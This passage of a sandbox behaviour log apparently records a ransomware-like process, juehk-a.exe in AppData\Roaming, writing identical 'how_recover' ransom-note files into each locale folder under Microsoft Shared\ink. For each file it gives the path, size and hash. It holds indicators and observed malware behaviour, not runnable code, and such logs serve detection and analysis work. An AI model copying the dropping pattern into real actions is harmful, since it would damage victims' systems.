16567.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16568.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16569.            ads:
16570.          fid (ads:): 1125899906942482
16571.          ntstatus: 0x0
16572.          CreateOptions: 0x60
16573.        file:
16574.          timestamp: 76095
16575.          mode: close
16576.          sequenceNumber: 1175
16577.          value: C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\how_recover+deg.html
16578.          filesize: 9480
16579.          md5sum: a68c3caf0be8f1a393c697136926cfd4
16580.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
16581.          processinfo:
16582.            pid: 1648
16583.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16584.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16585.            ads:
16586.          fid (ads:): 1125899906942482
16587.          ntstatus: 0x0
16588.          CreateOptions: 0x0
16589.        file:
16590.          timestamp: 76106
16591.          mode: created
16592.          sequenceNumber: 1176
16593.          value: C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\how_recover+deg.txt
16594.          processinfo:
16595.            pid: 1648
16596.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16597.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16598.            ads:
16599.          fid (ads:): 844424930231827
16600.          ntstatus: 0x0
16601.          CreateOptions: 0x60
16602.        file:
16603.          timestamp: 76114
16604.          mode: close
16605.          sequenceNumber: 1177
16606.          value: C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\how_recover+deg.txt
16607.          filesize: 2673
16608.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
16609.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
16610.          processinfo:
16611.            pid: 1648
16612.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16613.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16614.            ads:
16615.          fid (ads:): 844424930231827
16616.          ntstatus: 0x0
16617.          CreateOptions: 0x0
16618.        file:
16619.          timestamp: 76139
16620.          mode: created
16621.          sequenceNumber: 1178
16622.          value: C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\how_recover+deg.html
16623.          processinfo:
16624.            pid: 1648
16625.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16626.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16627.            ads:
16628.          fid (ads:): 562949953521172
16629.          ntstatus: 0x0
16630.          CreateOptions: 0x60
16631.        file:
16632.          timestamp: 76145
16633.          mode: close
16634.          sequenceNumber: 1179
16635.          value: C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\how_recover+deg.html
16636.          filesize: 9480
16637.          md5sum: a68c3caf0be8f1a393c697136926cfd4
16638.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
16639.          processinfo:
16640.            pid: 1648
16641.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16642.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16643.            ads:
16644.          fid (ads:): 562949953521172
16645.          ntstatus: 0x0
16646.          CreateOptions: 0x0
16647.        file:
16648.          timestamp: 76155
16649.          mode: created
16650.          sequenceNumber: 1180
16651.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO\how_recover+deg.txt
16652.          processinfo:
16653.            pid: 1648
16654.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16655.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16656.            ads:
16657.          fid (ads:): 562949953521173
16658.          ntstatus: 0x0
16659.          CreateOptions: 0x60
16660.        file:
16661.          timestamp: 76165
16662.          mode: close
16663.          sequenceNumber: 1181
16664.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO\how_recover+deg.txt
16665.          filesize: 2673
16666.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
16667.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
16668.          processinfo:
16669.            pid: 1648
16670.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16671.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16672.            ads:
16673.          fid (ads:): 562949953521173
16674.          ntstatus: 0x0
16675.          CreateOptions: 0x0
16676.        file:
16677.          timestamp: 76172
16678.          mode: created
16679.          sequenceNumber: 1182
16680.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO\how_recover+deg.html
16681.          processinfo:
16682.            pid: 1648
16683.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16684.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16685.            ads:
16686.          fid (ads:): 562949953521174
16687.          ntstatus: 0x0
16688.          CreateOptions: 0x60
16689.        file:
16690.          timestamp: 76179
16691.          mode: close
16692.          sequenceNumber: 1183
16693.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO\how_recover+deg.html
16694.          filesize: 9480
16695.          md5sum: a68c3caf0be8f1a393c697136926cfd4
16696.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
16697.          processinfo:
16698.            pid: 1648
16699.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16700.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16701.            ads:
16702.          fid (ads:): 562949953521174
16703.          ntstatus: 0x0
16704.          CreateOptions: 0x0
16705.        file:
16706.          timestamp: 76200
16707.          mode: created
16708.          sequenceNumber: 1184
16709.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\how_recover+deg.txt
16710.          processinfo:
16711.            pid: 1648
16712.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16713.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16714.            ads:
16715.          fid (ads:): 844424930231831
16716.          ntstatus: 0x0
16717.          CreateOptions: 0x60
16718.        file:
16719.          timestamp: 76209
16720.          mode: close
16721.          sequenceNumber: 1185
16722.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\how_recover+deg.txt
16723.          filesize: 2673
16724.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
16725.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
16726.          processinfo:
16727.            pid: 1648
16728.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16729.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16730.            ads:
16731.          fid (ads:): 844424930231831
16732.          ntstatus: 0x0
16733.          CreateOptions: 0x0
16734.        file:
16735.          timestamp: 76218
16736.          mode: created
16737.          sequenceNumber: 1186
16738.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\how_recover+deg.html
16739.          processinfo:
16740.            pid: 1648
16741.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16742.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16743.            ads:
16744.          fid (ads:): 844424930231832
16745.          ntstatus: 0x0
16746.          CreateOptions: 0x60
16747.        file:
16748.          timestamp: 76223
16749.          mode: close
16750.          sequenceNumber: 1187
16751.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\how_recover+deg.html
16752.          filesize: 9480
16753.          md5sum: a68c3caf0be8f1a393c697136926cfd4
16754.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
16755.          processinfo:
16756.            pid: 1648
16757.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16758.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16759.            ads:
16760.          fid (ads:): 844424930231832
16761.          ntstatus: 0x0
16762.          CreateOptions: 0x0
16763.        file:
16764.          timestamp: 76229
16765.          mode: created
16766.          sequenceNumber: 1188
16767.          value: C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\how_recover+deg.txt
16768.          processinfo:
16769.            pid: 1648
16770.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16771.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16772.            ads:
16773.          fid (ads:): 562949953521177
16774.          ntstatus: 0x0
16775.          CreateOptions: 0x60
16776.        file:
16777.          timestamp: 76243
16778.          mode: close
16779.          sequenceNumber: 1189
16780.          value: C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\how_recover+deg.txt
16781.          filesize: 2673
16782.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
16783.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
16784.          processinfo:
16785.            pid: 1648
16786.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16787.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16788.            ads:
16789.          fid (ads:): 562949953521177
16790.          ntstatus: 0x0
16791.          CreateOptions: 0x0
16792.        file:
16793.          timestamp: 76248
16794.          mode: created
16795.          sequenceNumber: 1190
16796.          value: C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\how_recover+deg.html
16797.          processinfo:
16798.            pid: 1648
16799.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16800.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16801.            ads:
16802.          fid (ads:): 844424930231834
16803.          ntstatus: 0x0
16804.          CreateOptions: 0x60
16805.        file:
16806.          timestamp: 76253
16807.          mode: close
16808.          sequenceNumber: 1191
16809.          value: C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\how_recover+deg.html
16810.          filesize: 9480
16811.          md5sum: a68c3caf0be8f1a393c697136926cfd4
16812.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
16813.          processinfo:
16814.            pid: 1648
16815.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16816.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16817.            ads:
16818.          fid (ads:): 844424930231834
16819.          ntstatus: 0x0
16820.          CreateOptions: 0x0
16821.        file:
16822.          timestamp: 76258
16823.          mode: created
16824.          sequenceNumber: 1192
16825.          value: C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\how_recover+deg.txt
16826.          processinfo:
16827.            pid: 1648
16828.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16829.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16830.            ads:
16831.          fid (ads:): 562949953521179
16832.          ntstatus: 0x0
16833.          CreateOptions: 0x60
16834.        file:
16835.          timestamp: 76262
16836.          mode: close
16837.          sequenceNumber: 1193
16838.          value: C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\how_recover+deg.txt
16839.          filesize: 2673
16840.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
16841.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
16842.          processinfo:
16843.            pid: 1648
16844.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16845.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16846.            ads:
16847.          fid (ads:): 562949953521179
16848.          ntstatus: 0x0
16849.          CreateOptions: 0x0
16850.        file:
16851.          timestamp: 76277
16852.          mode: created
16853.          sequenceNumber: 1194
16854.          value: C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\how_recover+deg.html
16855.          processinfo:
16856.            pid: 1648
16857.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16858.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16859.            ads:
16860.          fid (ads:): 562949953521180
16861.          ntstatus: 0x0
16862.          CreateOptions: 0x60
16863.        file:
16864.          timestamp: 76288
16865.          mode: close
16866.          sequenceNumber: 1195
16867.          value: C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\how_recover+deg.html
16868.          filesize: 9480
16869.          md5sum: a68c3caf0be8f1a393c697136926cfd4
16870.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
16871.          processinfo:
16872.            pid: 1648
16873.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16874.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16875.            ads:
16876.          fid (ads:): 562949953521180
16877.          ntstatus: 0x0
16878.          CreateOptions: 0x0
16879.        file:
16880.          timestamp: 76293
16881.          mode: created
16882.          sequenceNumber: 1196
16883.          value: C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\how_recover+deg.txt
16884.          processinfo:
16885.            pid: 1648
16886.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16887.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16888.            ads:
16889.          fid (ads:): 1688849860346362
16890.          ntstatus: 0x0
16891.          CreateOptions: 0x60
16892.        file:
16893.          timestamp: 76297
16894.          mode: close
16895.          sequenceNumber: 1197
16896.          value: C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\how_recover+deg.txt
16897.          filesize: 2673
16898.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
16899.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
16900.          processinfo:
16901.            pid: 1648
16902.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16903.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16904.            ads:
16905.          fid (ads:): 1688849860346362
16906.          ntstatus: 0x0
16907.          CreateOptions: 0x0
16908.        file:
16909.          timestamp: 76312
16910.          mode: created
16911.          sequenceNumber: 1198
16912.          value: C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\how_recover+deg.html
16913.          processinfo:
16914.            pid: 1648
16915.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16916.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16917.            ads:
16918.          fid (ads:): 562949953521181
16919.          ntstatus: 0x0
16920.          CreateOptions: 0x60
16921.        file:
16922.          timestamp: 76318
16923.          mode: close
16924.          sequenceNumber: 1199
16925.          value: C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\how_recover+deg.html
16926.          filesize: 9480
16927.          md5sum: a68c3caf0be8f1a393c697136926cfd4
16928.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
16929.          processinfo:
16930.            pid: 1648
16931.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16932.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16933.            ads:
16934.          fid (ads:): 562949953521181
16935.          ntstatus: 0x0
16936.          CreateOptions: 0x0
16937.        file:
16938.          timestamp: 76437
16939.          mode: created
16940.          sequenceNumber: 1200
16941.          value: C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\how_recover+deg.txt
16942.          processinfo:
16943.            pid: 1648
16944.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16945.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16946.            ads:
16947.          fid (ads:): 562949953521182
16948.          ntstatus: 0x0
16949.          CreateOptions: 0x60
16950.        file:
16951.          timestamp: 76443
16952.          mode: close
16953.          sequenceNumber: 1201
16954.          value: C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\how_recover+deg.txt
16955.          filesize: 2673
16956.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
16957.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
16958.          processinfo:
16959.            pid: 1648
16960.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16961.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16962.            ads:
16963.          fid (ads:): 562949953521182
16964.          ntstatus: 0x0
16965.          CreateOptions: 0x0
16966.        file:
16967.          timestamp: 76449
16968.          mode: created
16969.          sequenceNumber: 1202
16970.          value: C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\how_recover+deg.html
16971.          processinfo:
16972.            pid: 1648
16973.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16974.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16975.            ads:
16976.          fid (ads:): 844424930231839
16977.          ntstatus: 0x0
16978.          CreateOptions: 0x60
16979.        file:
16980.          timestamp: 76463
16981.          mode: close
16982.          sequenceNumber: 1203
16983.          value: C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\how_recover+deg.html
16984.          filesize: 9480
16985.          md5sum: a68c3caf0be8f1a393c697136926cfd4
16986.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
16987.          processinfo:
16988.            pid: 1648
16989.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16990.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16991.            ads:
16992.          fid (ads:): 844424930231839
16993.          ntstatus: 0x0
16994.          CreateOptions: 0x0
16995.        file:
16996.          timestamp: 76468
16997.          mode: created
16998.          sequenceNumber: 1204
16999.          value: C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\how_recover+deg.txt
17000.          processinfo:
17001.            pid: 1648
17002.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17003.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17004.            ads:
17005.          fid (ads:): 1125899906942496
17006.          ntstatus: 0x0
17007.          CreateOptions: 0x60
17008.        file:
17009.          timestamp: 76472
17010.          mode: close
17011.          sequenceNumber: 1205
17012.          value: C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\how_recover+deg.txt
17013.          filesize: 2673
17014.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
17015.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
17016.          processinfo:
17017.            pid: 1648
17018.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17019.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17020.            ads:
17021.          fid (ads:): 1125899906942496
17022.          ntstatus: 0x0
17023.          CreateOptions: 0x0
17024.        file:
17025.          timestamp: 76477
17026.          mode: created
17027.          sequenceNumber: 1206
17028.          value: C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\how_recover+deg.html
17029.          processinfo:
17030.            pid: 1648
17031.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17032.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17033.            ads:
17034.          fid (ads:): 844424930231841
17035.          ntstatus: 0x0
17036.          CreateOptions: 0x60
17037.        file:
17038.          timestamp: 76481
17039.          mode: close
17040.          sequenceNumber: 1207
17041.          value: C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\how_recover+deg.html
17042.          filesize: 9480
17043.          md5sum: a68c3caf0be8f1a393c697136926cfd4
17044.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
17045.          processinfo:
17046.            pid: 1648
17047.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17048.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17049.            ads:
17050.          fid (ads:): 844424930231841
17051.          ntstatus: 0x0
17052.          CreateOptions: 0x0
17053.        file:
17054.          timestamp: 76486
17055.          mode: created
17056.          sequenceNumber: 1208
17057.          value: C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\how_recover+deg.txt
17058.          processinfo:
17059.            pid: 1648
17060.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17061.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17062.            ads:
17063.          fid (ads:): 844424930231842
17064.          ntstatus: 0x0
17065.          CreateOptions: 0x60
17066.        file:
17067.          timestamp: 76490
17068.          mode: close
17069.          sequenceNumber: 1209
17070.          value: C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\how_recover+deg.txt
17071.          filesize: 2673
17072.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
17073.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
17074.          processinfo:
17075.            pid: 1648
17076.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17077.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17078.            ads:
17079.          fid (ads:): 844424930231842
17080.          ntstatus: 0x0
17081.          CreateOptions: 0x0
17082.        file:
17083.          timestamp: 76497
17084.          mode: created
17085.          sequenceNumber: 1210
17086.          value: C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\how_recover+deg.html
17087.          processinfo:
17088.            pid: 1648
17089.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17090.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17091.            ads:
17092.          fid (ads:): 562949953521187
17093.          ntstatus: 0x0
17094.          CreateOptions: 0x60
17095.        file:
17096.          timestamp: 76503
17097.          mode: close
17098.          sequenceNumber: 1211
17099.          value: C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\how_recover+deg.html
17100.          filesize: 9480
17101.          md5sum: a68c3caf0be8f1a393c697136926cfd4
17102.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
17103.          processinfo:
17104.            pid: 1648
17105.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17106.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17107.            ads:
17108.          fid (ads:): 562949953521187
17109.          ntstatus: 0x0
17110.          CreateOptions: 0x0
17111.        file:
17112.          timestamp: 76566
17113.          mode: created
17114.          sequenceNumber: 1212
17115.          value: C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA\how_recover+deg.txt
17116.          processinfo:
17117.            pid: 1648
17118.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17119.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17120.            ads:
17121.          fid (ads:): 562949953521188
17122.          ntstatus: 0x0
17123.          CreateOptions: 0x60
17124.        file:
17125.          timestamp: 76572
17126.          mode: close
17127.          sequenceNumber: 1213
17128.          value: C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA\how_recover+deg.txt
17129.          filesize: 2673
17130.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
17131.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
17132.          processinfo:
17133.            pid: 1648
17134.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17135.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17136.            ads:
17137.          fid (ads:): 562949953521188
17138.          ntstatus: 0x0
17139.          CreateOptions: 0x0
17140.        file:
17141.          timestamp: 76578
17142.          mode: created
17143.          sequenceNumber: 1214
17144.          value: C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA\how_recover+deg.html
17145.          processinfo:
17146.            pid: 1648
17147.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17148.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17149.            ads:
17150.          fid (ads:): 562949953521189
17151.          ntstatus: 0x0
17152.          CreateOptions: 0x60
17153.        file:
17154.          timestamp: 76586
17155.          mode: close
17156.          sequenceNumber: 1215
17157.          value: C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA\how_recover+deg.html
17158.          filesize: 9480
17159.          md5sum: a68c3caf0be8f1a393c697136926cfd4
17160.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
17161.          processinfo:
17162.            pid: 1648
17163.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17164.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17165.            ads:
17166.          fid (ads:): 562949953521189
17167.          ntstatus: 0x0
17168.          CreateOptions: 0x0
17169.        file:
17170.          timestamp: 76590
17171.          mode: created
17172.          sequenceNumber: 1216
17173.          value: C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\how_recover+deg.txt
17174.          processinfo:
17175.            pid: 1648
17176.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17177.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17178.            ads:
17179.          fid (ads:): 1125899906942502
17180.          ntstatus: 0x0
17181.          CreateOptions: 0x60
17182.        file:
17183.          timestamp: 76594
17184.          mode: close
17185.          sequenceNumber: 1217
17186.          value: C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\how_recover+deg.txt
17187.          filesize: 2673
17188.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
17189.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
17190.          processinfo:
17191.            pid: 1648
17192.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17193.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17194.            ads:
17195.          fid (ads:): 1125899906942502
17196.          ntstatus: 0x0
17197.          CreateOptions: 0x0
17198.        file:
17199.          timestamp: 76708
17200.          mode: created
17201.          sequenceNumber: 1218
17202.          value: C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\how_recover+deg.html
17203.          processinfo:
17204.            pid: 1648
17205.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17206.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17207.            ads:
17208.          fid (ads:): 844424930231847
17209.          ntstatus: 0x0
17210.          CreateOptions: 0x60
17211.        file:
17212.          timestamp: 76714
17213.          mode: close
17214.          sequenceNumber: 1219
17215.          value: C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\how_recover+deg.html
17216.          filesize: 9480
17217.          md5sum: a68c3caf0be8f1a393c697136926cfd4
17218.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
17219.          processinfo:
17220.            pid: 1648
17221.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17222.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17223.            ads:
17224.          fid (ads:): 844424930231847
17225.          ntstatus: 0x0
17226.          CreateOptions: 0x0
17227.        file:
17228.          timestamp: 76724
17229.          mode: created
17230.          sequenceNumber: 1220
17231.          value: C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\how_recover+deg.txt
17232.          processinfo:
17233.            pid: 1648
17234.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17235.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17236.            ads:
17237.          fid (ads:): 844424930231848
17238.          ntstatus: 0x0
17239.          CreateOptions: 0x60
17240.        file:
17241.          timestamp: 76731
17242.          mode: close
17243.          sequenceNumber: 1221
17244.          value: C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\how_recover+deg.txt
17245.          filesize: 2673
17246.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
17247.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
17248.          processinfo:
17249.            pid: 1648
17250.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17251.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17252.            ads:
17253.          fid (ads:): 844424930231848
17254.          ntstatus: 0x0
17255.          CreateOptions: 0x0
17256.        file:
17257.          timestamp: 76739
17258.          mode: created
17259.          sequenceNumber: 1222
17260.          value: C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\how_recover+deg.html
17261.          processinfo:
17262.            pid: 1648
17263.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17264.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17265.            ads:
17266.          fid (ads:): 562949953521193
17267.          ntstatus: 0x0
17268.          CreateOptions: 0x60
17269.        file:
17270.          timestamp: 76745
17271.          mode: close
17272.          sequenceNumber: 1223
17273.          value: C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\how_recover+deg.html
17274.          filesize: 9480
17275.          md5sum: a68c3caf0be8f1a393c697136926cfd4
17276.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
17277.          processinfo:
17278.            pid: 1648
17279.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17280.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17281.            ads:
17282.          fid (ads:): 562949953521193
17283.          ntstatus: 0x0
17284.          CreateOptions: 0x0
17285.        file:
17286.          timestamp: 76754
17287.          mode: created
17288.          sequenceNumber: 1224
17289.          value: C:\Program Files\Common Files\Microsoft Shared\ink\how_recover+deg.txt
17290.          processinfo:
17291.            pid: 1648
17292.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17293.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17294.            ads:
17295.          fid (ads:): 844424930231850
17296.          ntstatus: 0x0
17297.          CreateOptions: 0x60
17298.        file:
17299.          timestamp: 76759
17300.          mode: close
17301.          sequenceNumber: 1225
17302.          value: C:\Program Files\Common Files\Microsoft Shared\ink\how_recover+deg.txt
17303.          filesize: 2673
17304.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
17305.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
17306.          processinfo:
17307.            pid: 1648
17308.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17309.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17310.            ads:
17311.          fid (ads:): 844424930231850
17312.          ntstatus: 0x0
17313.          CreateOptions: 0x0
17314.        file:
17315.          timestamp: 76766
17316.          mode: created
17317.          sequenceNumber: 1226
17318.          value: C:\Program Files\Common Files\Microsoft Shared\ink\how_recover+deg.html
17319.          processinfo:
17320.            pid: 1648
17321.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17322.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17323.            ads:
17324.          fid (ads:): 562949953521195
17325.          ntstatus: 0x0
17326.          CreateOptions: 0x60
17327.        file:
17328.          timestamp: 76772
17329.          mode: close
17330.          sequenceNumber: 1227
17331.          value: C:\Program Files\Common Files\Microsoft Shared\ink\how_recover+deg.html
